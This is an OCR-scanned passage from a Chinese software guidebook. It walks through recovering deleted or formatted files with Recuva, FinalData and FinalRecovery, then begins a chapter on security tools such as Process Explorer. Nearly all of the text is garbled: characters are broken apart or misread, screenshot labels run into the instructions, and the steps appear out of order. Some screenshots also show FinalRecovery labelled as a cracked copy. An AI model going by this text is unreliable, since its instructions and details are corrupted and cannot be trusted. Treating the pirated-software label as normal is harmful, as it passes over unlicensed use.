图 证 风 空灵 淡 训 天元:.… 
一 | 国 十 剑 奇 天 落叶 沉 和 于 ..… 


通 师 折 访问 的 位 置 


司库 
各 |〗 PPTV 视 频 
国 视 未 
辑 | 图 片 
国文 档 
问 | 迅雷 下 载 
| 4 个 对 条 


(1 二 总计 恢复 4 个 文件 : 
一 完全 恢复 0 个 文件 
部 分 恢复 4 个 文件 


操作 使 用 时 间 0.20 种 . 


单 击 “ 确 定 ” 按 钮 。 


在 选择 的 恢复 文件 存储 位 置 可 查看 到 已 经 恢复 的 音 
乐 文件 。 


在 直接 搜索 文件 失败 时 ， 可 启用 深度 搜索 功能 。 该 功能 能 够 提高 文件 的 搜 


索 和 扫描 效果 ， 但 是 也 会 消耗 更 多 的 扫描 时 间 。 


2. 通过 扫描 特定 磁盘 位 置 恢复 数据 


Recuva 数据 恢复 软件 还 可 以 直接 扫描 特定 的 磁盘 位 置 来 恢复 文件 ， 这 样 可 以 大 大 节省 


扫 措 时间， 提高 文件 恢复 效率 。 
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STEP01: ”启动 Recuva 数据 恢复 软件 


文件 类 型 
您 在 恢复 什么 类 型 的 文件 ? 


加 所 有 文件 (A) 

显示 所 有 文件 ， 
局 图 片 (p) 

只 显示 图 片 文件 , 剖 如 数码 照片 , 
全 音乐 (M) 

只 显示 音乐 文件 , 例如 MP3 播放 器 的 音乐 交 件 . 
全 文档 (Dp) 

只 显示 公共 办 从 文档 格式 , 例如 Word 和 Excel 文件 ， 
全 视频 (V) 

只 显示 视频 文件 , 剖 如 数码 摄 人 机 拍摄 的 片段 ， 
全 压 乱 (CC) 

只 显示 压缩 文件 . 
局 电子 邮件 (FE) 


E 
Show only emails ffrom Thunderbird, OQutiook Express, Windows Mail and Microso 人 t 
Outook 


国 选择 “所 有 文件 " 单 单 击 “ 下 一 步 " 
选 按钮 按钮 。 
STEP03: 选择 要 恢复 的 文件 夹 


baiduyundownload 
1 FavoriteVideo 


册 Gamedownloader 


VaCache 
BwDownloadx 
"| MSOCache 
局 PHP+MySQL 目 录 及 前 二 章 内 容 


选中 要 恢复 的 贺 单 击 “ 确 定 " 
文件 夹 。 按钮 。 
STEP05:” 准备 查找 文件 


vat Recuva 查找 于 的 文件 列表 ， 
要 恢 熏 的 文件 并 点 击 恢 复 按 乌 ， 


如 果 前 次 查找 文件 失败 , 请 勾 选 这 一 选 框 . 注意 此 操作 在 
太 驱 动弹 上 需要 超过 一 个 小 时 ， 


门 启用 深度 搜索 (D) 


点 击 开始 执行 查找 ， 


| 


系统 和 数据 的 备份 与 恢复 


STEP02: 选择 文件 位 置 


文件 位 置 
文件 在 哪里 ? 


局 无 法 确定 () 
查找 本 计算 机 中 的 所 有 位 置 ， 
局 在 我 的 存 请 卡 或 iPod 上 
查找 所 有 可 移动 磁盘 (除了 CD 和 软盘 ) 上 已 删除 的 文件 . 


局 在 我 的 文档 (D) 
查找 用 户 文档 文件 来， 


局 在 回收 站 (B) 
查找 在 回收 站 是 除 的 文件 . 
回 在 特定 位 置 (5) 


压 一 步 m | [ ”取消 |] 


团 选中 “在 特定 位 
置 ” 单 选 按 钮 


单 击 “浏览 ”按钮 
STEP04: 查看 已 选择 的 文件 位 置 
Recuva 向 导 


文件 位 置 
文件 在 哪里 ? 


口 无 法 确定 加 
查找 本 计算 机 中 的 所 有 位 置 . 
局 在 我 的 存储 卡 或 Pod 上 
查找 所 有 可 移动 磁盘 除了 CD 和 软盘 ) 上 已 是 除 的 文件 ， 


局 在 我 的 文 消 (D) 
查找 用 户 文档 文件 来 , 


中 在 回收 站 (B) 
查找 在 回收 站 是 除 的 文件 ， 


避 在 特定 位 置 (5) 
:新 建文 件 夹 kankan 


Oona CD / DVD 


| 
单 击 “下 一 步 ” 按钮 。 


单 击 “ 开 始 ” 按 钮 即 开始 扫描 , 接 下 来 的 步 又 与 " 通 
过 向 导 恢 复数 据 ” 中 的 STEP05~ STEP09 相 同 。 
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Te > 


工具 全 攻略 


会 全 对 性 
3. 通过 扫描 内 容 恢 复数 据 
当 菏 个 文件 出 现 问 题 时 ， 用 户 可 选择 通过 扫描 内 容 的 方式 来 恢复 文件 数据 。 现 在 详细 
介绍 使 用 Recuva 数据 恢复 软件 通过 扫描 内 容 恢复 数据 的 具体 操作 方法 和 步 又 。 
STEP01: ”启动 Recuva 数据 恢复 软件 STEP02: 打开 数据 恢复 软件 主 界面 


SY Piriform Recuva 


欢迎 来 到 Recuva 向 导 


这 个 向 号 会 帮助 您 庆 复 您 是 除 的 文件 , 只 需 回 答 漳 单 几 
个 问题 , Recuva 会 帮 和 您 做 余下 的 事情 . 


如 果 您 不 想 使 用 向 导 , 简单 的 单 击 一 下 取消 您 将 可 以 访 
问 Recuva 的 高 级 功能 . 


启动 时 不 显示 此 向 导 作 ) 
单 击 “取消” 按钮。 选择 要 扫描 的 磁盘 及 文件 类 型 。 
STEP03: 单 击 “ 扫 描 内 容 " 命 令 STEP04: 输入 搜索 关键 字 


EE Piriform Recuva | piriform Recuva 


4 com v1.49,1019 
RecUVa.com v1.49.1019 二 do 7 请 二 
Y WAIN DIT oP 
Microsoft Windows 7 语 船 版 32-bit SP1 本 - Pen de m Dual-Core s CP | 


Pentium Dual-Core CPU E6300 @ 2.80GHz, 4.0GB RAM, Intel G41 
a 本 地 磁盘 人:) ”| | 扫描 (5) | |  *.docl™.xls|*.pptl*.odt 
ee 1 


上 本 地 磁盘 人 :) 


第 15 章 数据 恢复 | 


局 =docl=.xlsl*,pptl*.odtl*,odsl*,pdfE ~ 


设置 完成 后 单 击 “扫描 ”按钮 右 侧 的 下 拉 按 钮 ， 在 ” 单 击 “扫描 ”按钮 。 
展开 的 列表 中 单 击 “扫描 内 容 ” 命 令 。 
STEP05: 开始 扫描 


步 巡 2 共 平 Analyzing damage 
当前 进度 : 45%% 
查看 扫描 进度 ， 扫 描 完 成 后 ， 用 户 可 按照 “通过 向 


BE | 
预计 镜 作 时间: 0 分 导 恢 复数 据 ” 的 STEP06~ STEP09 进行 操作 。 
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< 人 冀 16 章 
系统 和 数据 的 备份 与 恢复 


16:3.2 ”使 用 FinalData 恢复 数据 


FinalData 具有 强大 的 数据 恢复 功能 ， 并 且 使 用 非常 简单 。 它 可 以 轻松 恢复 误 删 数据 和 
误 格 式 化 便 盘 文件 ， 甚 至 恢复 U 盘 、 手 机 卡 、 相 机 卡 等 移动 存储 设备 的 误 删 文件 。 


1. 使 用 FinalData 恢复 误 删 文件 


当 用 户 在 计算 机 中 误 删 了 一 个 重要 的 文件 时 , 可 立即 停止 操作 并 通过 FinalData 来 恢复 
该 误 删 文件 。 接 下 来 详细 介绍 使 用 FinalData 恢复 误 删 文件 的 具体 操作 方法 和 步 又 。 


STEP01: 运行 FinalData STEP02: 选择 要 恢复 的 文件 和 目录 


[assxeal 


BElDEle 购买 注册 | FimalData 购买 注册 
DATA RECOVERY @) 使 用 教程 © 用 户 评价 (a DATA RECOVERY @ 使 用 教程 图 用 户 评价 


请 选择 要 恢复 的 文件 和 目录 所 在 的 位 置 


了 


建文 件 夫 
二 [ 屁 星 下 载 ] ACDSeezr 06. 1. 197_Lite 等 . zip 


恢复 波 永 久 出 除 的 文件 或 者 目录 : 
1 RISE 信件 
。 支持 恢复 诛 宁 约 文 
ee 
[ EYP+ 三 章 
pot - zip 
-Wh Private 


由 内 Pr 于 
mE 


: 18667133607 QQ: 4006718068 伏 QQ 在 线 


单 击 主 界面 上 的 “ 误 删 除 文件 ”图 标 。 单 击 “下 一 步 ”按理 s 
STEP03: 查找 已 删除 的 文件 STEP04: 查看 扫描 到 的 文件 


EinalData 购买 注册 FImalData 购买 注册 


DATA RECOVERY a SY DATA RECOVERY 使 用 教程 ”全 用 户 评价 


查找 已 经 删除 的 文件 扫描 结果 提示 : 经 回收 站 币 除 的 文件 ， 会 被 系统 自动 更 改名 称 ! 
a ER se ER EEC 晤 xl x 


大 小 创建 时 间 修改 时 间 最 后 访问 时 间 


正在 扫描 文件 ， 请 稍 候 
| 


由 - 9- 口 BD SRECYCLE.BIN 
由 - 口 有 #Lost Path# 
当前 找到 的 已 出 除 文件 : 

正在 分 析 文 件 系统 ， 请 稍 候 


: 18667133607 : A006718068 : 13667133607 : 4006718068 一 
可 查看 扫描 文件 的 进度 。 勾 选 需要 恢复 的 单 击 “ 下 一 步 " 
文件 夹 。 按钮 。 
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”A 里 安 


STEP05: 选择 恢复 路 STEP06: 设置 要 恢复 的 文件 存储 位 置 


[js 


BEE 购买 注册 
I DATA RECOVERY 


(2) 使 用 教程 a 


选择 恢复 路 径 
司库 
b 上 家 庭 组 


请 选择 一 个 目录 存放 恢 夏 出 来 的 文件 : 
D:\EDR 


> [Bssn 
:一 计算 机 
”人 网 络 


如 果 0 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 50 个 
文件 大 小 总 计 : 1.54 GB 


文件 夹 灾 ) : ss 


新 建文 件 来 吕 ) 


单 击 “ 浏 览 ”按钮 。 选 定 存储 位 置 后 单 击 “确定 ”按钮 。 
STEP07: 返回 “选择 恢复 路 径 ” 


FnalData 


DATA RECOVERY 加 使 用 教程 ““@ 用 户 评价 


选择 恢复 路 径 


请 选择 一 个 目录 存放 恢复 出 来 的 文件 : 


查看 已 选择 的 恢复 路 径 。 


如 果 D 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 50 个 
文件 大 小 总 计 : 1.54 


单 击 “ 下 一 步 ” 按 钮 ， 即 可 对 文件 进行 恢复 。 


2. 使 用 FinalData 恢复 误 格式 化 硬盘 文件 

当 用 户 不 小 心 将 便 盘 格式 化 后 忽然 发 现 便 盘 中 还 有 重要 数据 时 , 可 以 使 用 FinalData 来 
恢复 误 格 式 化 硬盘 文件 。 接 下 来 惑 详细 介绍 使 用 FinalData 恢复 误 格 式 化 硬盘 文件 的 具体 操 
作 方 法 和 步骤 。 
STEP01: 打开 FinalData 主 界面 STEP02: 选择 要 1 次 复 的 分 区 


EmalData 购买 注册 
DATA RECOVERY 9) 使 用 教程 @ 用 户 评价 


FinalData 


DATA RECOVERY 


请 选择 要 恢复 的 分 区 


> sa o， 


> hma oo 
= 区 tutulisk WW:) 


格式 化 前 的 文件 际 统 : 


: 18667133607 99: 40067180638 6& QQ 在 线 


客服 电 硒 : 18667133607 QQ: 4006718068 
单 击 “ 误 格式 化 硬盘 ”图 标 。 选中 要 恢复 的 分 区 。 留 单 击 “ 下 一 步 " 按钮 。 
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STEP03: ”查找 分 区 格式 化 前 的 文件 


FinalData ae 
a z pe 
Qa DATA RECOVERY () 使 用 教程 ss) 用 户 评价 


查找 分 区 格式 化 前 的 文件 


正在 扫描 文件 ， 请 稍 候 …… 


当前 扫描 到 的 文件 : 
W: \DIR2\QDWAHNFG_YDS}08_GARX46J. xml 


查看 扫描 进度 。 


STEP05: ”选择 恢复 路 径 


ed 


FinalData 购 习 注册 


A 一 一 一 一 
号 DATA RECOVERY @ 使 用 教程 转 用 户 评价 


选择 恢复 路 径 


请 选择 一 个 目录 存放 恢复 出 来 的 文件 : 
D:NODR 


如 果 0 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 197 个 
文件 大 小 总 计 : 3.99 吧 


客服 电话 : 18667133607 QQ: 4006718068 [7 
单 击 “ 浏 览 ”按钮 。 
“选择 恢复 路 径 ” 对 话 框 


CE 


STEP07: 返回 


FinalData 


图 ”DATARECOVERY 


购买 注册 
C@) 使 用 教程 aa 


选择 恢复 路 径 
请 选择 一 个 目录 存放 收复 出 来 的 文件 : 
如 果 了 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 * 


选择 恢复 文件 : 197 EE 
文件 大 小 总 计 : 3. 99 


3. 使 用 FinalData 恢复 U 盘 、 手 机 卡 和 相机 卡 的 误 删 文件 


第 16 章 


系统 和 数据 的 备份 与 恢复 


STEP04: 可 恢复 的 文件 或 文件 夹 


FinalData 


DATARECOVERY 


《2) 使 用 教程 


局 最 后 修改 时 间 不 限 
国 ”今天 
国 ”一周 内 
国 ”本 月 内 
团 ”今年 内 


输入 文件 名 搜索 


勾 选 需要 恢复 的 国 单 击 “下 一 步 
文件 夹 。 按钮 。 
STEP06: 设置 要 恢复 的 文件 存储 位 置 


大 桌面 
国库 
;网 家 庭 组 
b 豚 ssn 


;> 加 计算 机 
> 人 网 络 


文件 夹 @): ssn 


ED 
选 定 文件 存储 位 置 后 单 击 “ 确 定 ” 按 钮 。 


查看 已 选择 的 文件 恢复 路 径 。 


单 击 “ 下 一 步 ” 按 钮 ， 即 可 对 文件 进行 恢复 。 


U 盘 、 手 机 卡 和 相机 卡 是 一 种 与 普通 硬盘 的 存储 介质 完全 不 同 的 数据 存储 设备 。 在 此 
类 存储 设备 中 数据 被 删除 后 并 不 会 被 转移 到 回收 站 中 ， 而 是 直接 被 彻底 删除 ， 但 是 通过 


315 


ST IF 一 一 


-人命 人 人 他 
FinalData 却 可 以 恢复 被 这 些 设备 误 删 除 的 文件 。 接 下 来 孢 详细 介绍 使 用 FinalData 恢复 U 
和 崔 、 手 机 卡 和 相机 卡 误 删 除 文件 的 具体 操作 方法 和 步骤 。 


STEP01: ”打开 FinalData 主 界 面 STEP02: 选择 要 恢复 的 移动 存储 设备 
see 全 


FinalData i 
DATA RECOVERY 后 使 用 教 各 罗 用户 评 价 


工具 全 攻略 


pinalData 购买 注册 


DATA RECOVERY @ 使 用 教程 @ 用 户 评价 


请 选择 要 恢复 的 移动 存储 设备 


二 = 有 J] 盘 ( 移动 存 博 设备 0 ) 


: 18667133607 QQ: 4006718068 


单 击 “U 盘 手机 相机 卡 恢复 ”图 标 。 选中 要 恢复 的 移 加 单 击 “ 下 一 步 " 
动 存储 设备 。 按钮 。 


STEP03: 合击 移 动 和 情 纳 谷中 的 二 关 六 作 STEP04: 查看 搜索 到 的 内 容 


FinalData 1 ] FinalData i 
DATA RECOVERY (9) 使 用 教程 @ 用户 评价 DATA RECOVERY 9) 使 用 教程 图 用 户 评价 


搜索 移动 存储 设备 中 的 丢失 文件 


正在 扫描 文件 ， 请 稍 候 


当前 找到 的 文件 : 
doc\00000147. doc 


二 省- 和 ET TTT3YSETTT 和 QQ 在 线 : 18667133607 QQ: 4006718068 仍 QQ 在 线 | 
查看 搜索 进度 。 勾 选 需要 恢复 的 广 单 击 “ 下 一 步 " 
件 格 式 。 按钮 。 
STEP05: ”选择 文件 恢复 路 径 STEP06: 设置 要 恢复 的 文件 存储 位 置 


= 


FnmalData 购买 注册 

加 ”DATARECOVERY (GEE Tee 
点 U 盘 恢复 

WET Utility 

wr 
>” 山 Xmp 
b> WD ZoomBrowser EX 

和 ZoomBrowser EX MCU 


选择 恢复 路 径 


请 选择 一 个 目录 存放 恢复 出 来 的 文件 : 
D:\EDR 


如 果 0 盘 有 文件 需要 恢复 ， 请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 9631 宙 
文件 大 小 总 计 : 2.81 GB 


文件 夹 下 ): 新 建文 件 夹 G) 


新 建文 件 来 如 


: 18667133607 : 4006718068 to 


单 击 “浏览 ”按钮 。 选中 文件 存储 位 置 后 单 击 “ 确 定 ” 按 钮 。 
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< 化 16 章 
系统 和 数据 的 备份 与 恢复 


STEP07:” 返回 “选择 恢复 路 径 ” 对 话 框 


FinalData 购买 注册 
PE gr 
Co) 使 用 教程 Lae 


[DJ 三 人 6 iat 


查看 已 选择 的 文件 路 径 。 


如 果 了 盘 有 文件 需要 恢复 ,请 另外 选择 目录 存放 恢复 出 来 的 文件 。 
选择 恢复 文件 : 。。 “9631 个 
文件 大 小 总 计 : 2.81 GB 


可 证 宝 汪 | 二 一 国 单 击 “ 下 一 步 ”按钮 ， 即 可 对 文件 进行 恢复 。 
: 18667133607 : 4006718068 


10.3.3 ”使 用 FinalRec0vVely 恢复 数据 


FinalRecovery 是 一 球 功 能 强大 而 日 非常 容易 使 用 的 数据 恢复 工具 。 它 可 以 帮助 用 
户 快速 地 找 回 被 误 删 除 的 文件 或 者 文件 夹 ， 文 持 便 盘 、 软 盘 、 数 码 相 机 存储 卡 、 记 忆 
棒 等 存储 介质 的 数据 恢复 ， 可 以 恢复 在 命令 行 模式 、 资 源 管 理 恬 或 其 他 应 用 程序 中 被 
删除 或 者 格式 化 的 数据 。 即 使 已 清 宇 了 回收 站 ， 它 也 可 以 帮助 用 户 安 全 并 完整 地 将 数 
据 找 回来 。 

1. 标准 恢复 

在 “标准 恢复 ”模式 下 ，FinalRecovery 可 对 所 选 倍 盘 进 行 快 速 扫描 ， 并 恢复 该 磁 
熏 下 的 大 部 分 文件 。 接 下 来 怠 详 细 介 绍 使 用 FinalRecovery 进行 标准 恢复 的 具体 操作 方 
法 和 步骤 。 


STEP01: ”启动 FinalRecovery STEP02: ”选择 要 扫描 的 磁盘 


SF Fi ee 2.2 


; 文件 选项 帮助 
| OL 网 钴 | 各 搬 2 | 全 由 ORE © mm 


: OFA en huyufeng 
ous 


NEETSOFT 竖 
FINALRECOVERY.COM 


帮助 与 使 用 指南 
FinalRecovery 的 帮助 文件 。 


FinalRecovery 网 站 


了 解 更 多 关于 了 
的 信息 ， 在 线 订购 完全 版 


的 电脑 
5: 03.29 6G8) 无 名 称 
-< D: (126.87 65B) 无 名 称 


一 ep; (131.84 56B) 无 名 称 


注册 
2 输入 许可 证 名 称 和 注册 码 以 开 
: 启 全 部 功能 。 
回 


在 主 界面 中 单 击 “标准 恢复 ”图 标 。 单 击 要 扫描 的 磁盘 后 直接 开始 扫描 。 
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ST IF 一 一 


合 人 他 他 


具 全 攻略 


区 结果 : 久 选 需要 恢复 的 文件 夹 复 选 杠 
STEP03: 查看 扫描 结 STEP04:” 勾 选 需要 恢复 的 文件 夹 复 选 框 
四 FinslRecovery - 标准 攀 复 罗 FinalRecovery - 高 级 恢复 (=e 
文件 选项 帮助 
中 悚 扫 据 结 果 文件 类 弄 大 小 创建 时 间 
是 EE CI = 
个 文件 夹 000002 文件 夹 12/20/13 01:13 PM 
全 文件 夹 000003 文件 夹 01/10/14 04:30 PH 
| | 全 文件 夹 oo0o04 文件 夹 0 01/10/14 04:30 FH 
746246_ 局 文件 夹 000005 文件 严 0 12/20/13 01:05 PH 
尹 6 封面 有 局 四 芳村 | 学 全 校 学 生 照 片 全 六 件 夹 00c008 ACDSee P 7.84 到 09/28/13 11:03 骨 
-i pn [5] 回 ) ‘Yape47s. THP 局 文件 夹 000007 ACDSee P 2.71 上 09728713 10:57 贡 
… 剖 | 新 尘 文 件 夫 2) 回 二 YYRLI151.TIP 全 文件 赤 000008 ACDSee Pro 83.65 KB 09/28713 10:31 央 | 
国字 索 回 x ?01105"1. JPc 甩 文件 夹 000009 文件 夹 0 Olf10/14 04:30 FH ~ 
语 一 一 ”加 文件 夹 000010 -| “< 蕊 -nm vv | 
加 4935 个 FAT 条 目 加 0 个 PS 条目 
电脑 我 的 电脑 ^ 
La C: (13.29 GB) 无 名 称 Ey (C:) HoName 文件 名 值 
iD (126.87 6B) “wp 0:) Holane 常规 
spE: (131.84 GB) Ep (EF:) Hollame 文件 名 新 建文 件 夹 (2) 
< 了 : (133.76 GB) -< (FP:) JoNane 类 型 文件 夫 E 
: (3.74 6B) -< 0:) 王 叶 | 中 大 小 8192 | 
Pt: (511.50 MB) tutuDisk Pp 国 :) tutuDisk | 引 《 分 配 8192 加 
日 -人 @ 司 里 E 动 器 o0H (485. 76 6B) 创建 日 期 08/14f13 05:57 PH 
，- 国 C:) (3.29 68) ‖ 修改 日 期 08/14/13 05:57 PH 
， 白 @ 扩展 分 区 (92.47 68) We 09/28/13 12:00 则 
| - 国 o:) (26.87 63) 
国 C:) (131.84 GD) | = ] F | 
(F:) (133.76 6B) 
EE :人 @ 基 物理 驱动 器 ou G. 75 6GB) 二 | F 关 江天 写 ; 于 区 用 程序 日 志 | 
| 48 个 文件 , 5 个 文件 夹 


扫描 时 间 会 根据 磁盘 大 小 而 有 所 不 同 ， 扫 描 完成 后 
显示 扫描 结果 。 


STEP05: ”选择 目录 


单 击 “ 恢 复 ”按钮 。 


STEP06: ”查看 已 恢复 的 文件 


文件 (F) ”编辑 (E) 
组 织 辐 打开 


音 看 (V) 工具 (T) ”帮助 (H) 
新 建文 件 夫 团 @ 


收 改 日 期 


找 回 的 区 件 将 被 保存 在 该 目录 中 : 


这 收藏 夫 

轧 下 载 

a 豪 面 
过 最 乒 访 问 的 位 置 


2014/1/13 10:34 
2014/1/13 10:34 


D: 恢复 文件 


警 吉 :; 如 果 您 将 文件 保存 在 被 
贺 除 数据 的 分 区 上 ， 则 有 可 能 
将 需要 恢 收 的 数据 覆盖 。 


已 选择 2 个 项 修改 日 期 : 2014/1)13 10:34 


三 由 中 四 国耻 ， 


单 击 “ 浏 览 ” 按 钮 ， 

恢复 文件 的 存储 位 置 。 
2， 高 级 恢复 
接 下 来 就 详细 介绍 使 用 FinalRecovery 进行 高 级 恢复 的 具体 操作 方法 和 步骤 。 


选择 要 扫描 的 磁盘 


选择 ” 国 单 击 “确定 ” 在 所 选 存 储 位 置 查看 到 已 经 恢复 的 文件 。 


按钮 。 


STEP01: 打开 FinalRecovery STEP02: 


网 FinalRecovery - 高 级 恢复 
; 文件- 选 页 帮助 
攻 Di 0) 全 上 Wu | OA OE 


pe - 
多 反 撕 结 天 文件 名 


[KM FinalRecovery 2.2 


; 0FA 破解 : huyufeng 


WYW. C a ouse. com 


MEETSOFT 
FINALRECOVERY.COM 


文件 类 型 “| 大 小 创 当 时 间 


标准 恢复 帮助 与 使 用 指南 


ee 


高 级 恢复 


从 被 格式 化 、 被 员 除 的 分 区 中 
恢复 文件 ; 恢复 在 标准 模式 中 
无 法 找到 的 文件 。 


IDE 硬 咀 碎 康 诊断 
折 S.M. A. R.T 报告 硬盘 


单 击 “ 高 级 恢复 ”图 标 。 
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FinalRecovery 的 帮助 文件 。 


FinalRecovery 网 站 


了 解 更 多 关于 FinalRecovery 
的 信息 ， 在 线 订购 完全 版 。 


< (C:) JoNane 
< 00:) JoNane 
< (E:) HoNane 
"Sp (FF:) HoHane 
sm (G: ) 王 明 丽 
SP (WW:) tutuDisk 
日 令 物 [ 国 E 动 器 00H (485. 76 GB) 
(:) 03.29 GB) 
白 生 扩展 分 区 (392. 47 58) 
画 0:) (126.67 55) 
- 国 C:) (31.84 68) 
-- 辆 (4:) (133.78 68) 
日 今 项 加 Ei 器 01H (124.99 GB) 
“图 未 合用 .00 MB) 


注册 
输入 许可 证 名 称 和 注册 码 以 开 
启 全 部 功能 。 

日 


访问 日 其 


属 几 
< 


单 击 要 扫描 的 磁盘 后 直接 开始 扫描 


STEP03: 查看 扫描 结果 STEP04: 选择 要 恢复 的 文件 夹 


因 FinalRecovery -高 级 恢复 ' 四 FinalRecovery - 高 级 恢复 [=o 9 
; 文件 选项 帮助 ; 文件 选 页 部 助 
“人 措 “智能 OE 局 庆 | 国良 国 寞 本 加 公民 雷 |@ 司 OE 
日 和 扫描 结果 i a 日 多 扫 据 结果 文件 名 文件 类 型 大 小 创 尘 时 间 加 
| -门生 文件 夹 9 08 3 05;5 : pe 了 同 EEEERS 08/14/13 05:57 FM 
| 四 上 广 . 12/20/13 01:13 ru ” 瑟 辐 文件 夹 000002 团 忆 计算 机 类 文件 夹 0 12720713 01:13 PH 
| - 12/20/13 01:18 PU Ed 二 文件 夹 000003 回避 KWTORWE. INF 文件 来 0 01/10/14 04:30 FH 
| 回 文 O01/10/14 04:30 PH  - 回 文 件 来 000004 回回 AmORUN IIF 文件 来 0 01710714 04:30 PH 
5 12/20/13 01:05 PM | - 回 文 件 来 000005 回避 封面 有 图 文件 夹 0 12/20/13 01:05 PH 
| 09/28/13 11:03 A 一 加 文件 夹 000006 同门 朝 三 不 套 慕 _alpha_ wwr_sh.. ACDSee Pro ... 7.84 了 09/28/13 11:03 册 
i ”二 全 文件 夹 000007 回电 和 旷 . sas | 09/28/13 10:57 由 | 大 文件 夹 000007 回 | 幻影 ,psda ACDSee Pro ... 2.71 中 09/28/13 10:57 圳 
一 司 文件 夹 000008 | .i i E 09/28/13 10:31 AM “加 文件 夹 000008 回 | 幻影 jpg ACDSee Pro ... 83.65 1B 09728713 10:31 戎 中 
i 二 回 文件 夫 000009 回回 冷 i = 09/28/13 01:47 PH | 上-- 回 文 件 来 000009 回避 AUTORWN. INF 文件 来 0 01/10714 04:30 PH ~ 
| 一 癸 文 件 夹 000010 ] | -= 回 文件 夹 000010 dm 器 ] + 
全 4935 个 FAT 条 目 加 0 个 FS 条 目 _ 
我 电脑 回 4935 个 FAT 条 目 口 0 个 WFS 条 目 
Pp (C:) Nolane 文件 名 值 全 
ad (D0:) Wolane 常规 
ee 文件 名 新 建文 件 夫 2) 
-Sp (F:) NolNane 类 型 文件 夹 器 
< 8192 -< (J:) 王 Te > 
: ee | 分 本 8192 Sp WW:) tutuDisk 2 Ss | 
区 动 器 OOH (465.76 GB) 08/14/13 05:57 PH 日 -@@ 物理 驱动 器 00H (465. 76 GB) 可 
[ 29 68) 08/14/13 05:57 PHM | "“ 国 C:) (3.29 @) na SR 
区 (392.47 GB) i 09/28/13 12:00 央 日 - 扩展 分 区 (392.47 68) : 
- 国 0:) (126.87 68) 上 国 o) (26.87 @) 访问 日 期 SS 10 1 
”31.84 68) L 1.84 68) i 亚 ”有 
国 C:) (133.76 68) 一 一 一 - | 国 (:) (133.76 68) 一 一 一 一 一 一 
日 ‘@ 物 时 Ez 器 OI (3.75 68) 本 -人 @ 哲理 动 器 OH 6.75 8) 怕 关于 利得 看 ”人 ”查找 。”/ 核 正 ”人 应 用 程 | 
| 48 个 文件 ,5 个 文件 夹 


查看 显示 扫描 结果 。 人 勾 选 需要 恢复 的 文件 夹 ， 单 击 “恢复 ”按钮 。 
STEP05: 选择 目录 STEP06: 查看 已 恢复 的 文件 


文件 (F) ”编辑 (E) ” 章 春 (V) 工具 (T) ”帮助 (H) 
组 织 了 包含 到 库 中 ~ 新建 文件 去 


2014/1/13 11:0 
2014/1/13 11:0 


单 击 “ 浏 览 ” 按 单 击 “ 确 定 ” ”在 所 选 存储 位 置 查看 到 已 经 恢复 的 文件 。 
选择 恢复 文件 的 按钮 。 
存储 位 置 。 


©@ 使 用 FinalRecovery 恢复 文件 时 ， 切 勿 一 次 性 恢复 大 于 512MB 的 文件 ， 否 
则 可 能 导致 FinalRecovery 自动 退出 或 者 内 存 出 错 。 在 这 种 情况 下 , 建议 分 多 次 


提示 。 进行 恢复 ， 一 般 恢复 一 个 60GB 的 硬盘 需要 3~4 天 的 时 间 。 
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系统 安全 防护 工具 


由 于 目前 的 病毒 不 仅 种 类 繁多 ， 而 且 攻 击 方式 也 层出不穷 ， 为 了 改变 这 种 
被 动 的 局 面 ， 用 户 可 以 使 用 系统 管理 工具 、 杀 毒 软 件 、360 安全 卫士 等 工具 来 保 
护 系统 的 安全 。 


OO 进程 查看 器 Process Explorer 

O 网 络 检测 工具 Colasoft Capsa 

O 〇 间谍 广告 杀手 Ad-Aware 

〇 用 Spy Sweeper 清除 间谍 软件 

〇 通过 事件 查看 器 抓 住 “间谍 ” 

〇 微软 反 间 谍 专 家 Windows Defender 的 使 用 流程 
O 浏 监 器 绑架 克星 HijackThis 

〇 诺顿 网 络 安全 特警 


O 360 安全 卫士 


系统 安全 防护 工具 


17.1 
可 以 利用 专门 的 工具 (对 计算 机 中 的 进程 、 网 络 运行 情况 、 注 册 表 、 端 口 以 及 木马 等 进 
行 检测 ， 以 发 现 黑客 的 踪迹 。 
17.11 ”进程 查看 器 PrOCES$S Explorer 
利用 进程 查看 器 Process Explorer， 不 仪 可 以 监视 、 暂 停 和 终 还 可 以 查看 进程 
调用 的 DLL 文件 ， 人 查看 CPU 及 内 存 使 用 情况 ， 对 进程 进行 调试 ， 它 是 协助 用 户 查 杀 木 马 、 


病毒 的 好 工具 。 使 用 进程 查看 器 Process Explorer 查看 进程 的 具 i 又 如 下 。 
STEP01: 打开 “Process Explorer” 主 窗口 STEP02: 提示 是 否 要 终止 进程 


文件 (FR) 选项 (D) 视图 (V) 进程 (P) 童 找 四 用 户 (U) Et 
加 | 国 | 到 则 昌国 | 略 XX| 的 国 :tkass 


Frocess 
Systen ldle Process 
目 | Systen 
En interrupts 


i Are you sure you want to kill sychost,exe? 


一 一 一 


日 副 Services. exe 


"| WmiPrvSE. exe 
[el ChsIME. exe 
SesoulneBroker. 


本 sogou os 设置 优先 级 (S) 
SosouCloud. e 


| 


单 击 “确定 ”按钮 ， 即 可 结束 进程 。 


Shift+ Del 


FlashUtil]_Acti 

|svechost. exe 

|svchost. exe 

[taskhoster. exe VirusTotal 检 查 (C) 

|svchost. exe 

| dasHost. exe 属性 (P)… 

1 svchost- exe 在 敌后 索 [O).… Ctrl+IM 


1 svchost. exe 


在 “进程 ”列表 中 选择 要 结束 的 进程 并 右 击 ， 在 弹 


出 的 快捷 菜单 中 选择 “结束 进程 ”命令 
STEP03: ”终止 进程 树 STEP04: ”提示 是 否 要 终止 进程 树 


Ee 2 a 人 查找 用户 (UU) “i 


Frocess 人 你 确定 要 绪 束 svchost,exe 和 它 的 之 进程 ? 
| 3ystea Idle Erocess x 8 K 0 名 
日 本 syston descendants? 


豆 | Interrupts 


2,124 KX 二 332 K 608 


结束 进程 (0 Dal 单 击 “ 确 定 ” 按 钮 ， 即 可 结束 选 定 的 进程 树 。 


设置 权限 (A) 
设置 优先 级 (5) 


结束 进程 柑 (T) Shift+Del 
重启 (R) 
挂 起 (U) 
创 告 苇 信 (C 〇 ) 
已 Rs: VirusTetal 检 查 (C) 


日 | schost- 层 性 (P)... 
En| dasHo 
